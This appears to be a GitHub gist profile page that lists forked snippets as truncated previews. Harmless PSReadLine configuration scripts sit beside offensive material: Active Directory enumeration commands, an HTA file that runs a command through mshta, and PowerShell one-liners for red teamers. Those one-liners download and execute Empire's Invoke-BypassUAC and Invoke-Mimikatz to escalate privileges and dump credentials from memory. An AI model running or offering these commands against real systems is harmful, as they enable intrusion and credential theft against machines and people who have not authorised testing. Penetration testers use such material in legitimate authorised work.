MK xblack199

🎯
Focusing
View GitHub Profile
@xblack199
xblack199 / Optimize-PSReadlineHistory.ps1
Created January 29, 2025 00:17 — forked from rkeithhill/Optimize-PSReadlineHistory.ps1
Removes duplicate and optionally short commands from your PSReadline history file
<#
.SYNOPSIS
Optimizes your PSReadline history save file.
.DESCRIPTION
Optimizes your PSReadline history save file by removing duplicate
entries and optionally removing commands that are not longer than
a minimum length
.EXAMPLE
C:\PS> Optimize-PSReadlineHistory
Removes all the duplicate commands.
@xblack199
xblack199 / PSReadLine_config.ps1
Created January 29, 2025 00:04 — forked from rkeithhill/PSReadLine_config.ps1
Config file for PSReadLine
# Other hosts (ISE, ConEmu) don't always work as well with PSReadLine.
# Also, if PS is run with -Command, PSRL loading is suppressed.
$psrlMod = Get-Module PSReadLine
if (($null -eq $psrlMod) -or ($host.Name -eq 'Windows PowerShell ISE Host')) {
    return
}
elseif ($psrlMod.Version.Major -lt 2) {
    throw "PSReadLine 1.x installed or not imported, import PSRL or upgrade to at least 2.x."
}
if (($PSVersionTable.PSVersion.Major -le 5) -or $IsWindows) {
    Set-Alias nano 'C:\Program Files\Git\usr\bin\nano.exe'
    Set-Alias vim 'C:\Program Files\Git\usr\bin\vim.exe'
}
# Edition/platform specific configuration
if ($IsWindows) {
    $env:PAGER = 'less -Ps"Page %db?B of %D:.\. Press h for help or Q to quit\."'
    if ($PSVersionTable.PSEdition -eq 'Desktop') {
        $PSDefaultParameterValues['Get-Help:Full'] = $true
# Enumeration
# Credential Injection
runas.exe /netonly /user:<domain>\<username> cmd.exe
# enumeration users
users
net user /domain
🔥Complete Bug Bounty Cheat Sheet🔥
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
@xblack199
xblack199 / calc.hta
Created January 30, 2023 05:41 — forked from Arno0x/calc.hta
HTML Application example to be executed by mshta.exe
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>

Description:

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start     powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

@xblack199
xblack199 / PowerView-3.0-tricks.ps1
Created November 7, 2021 17:44 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set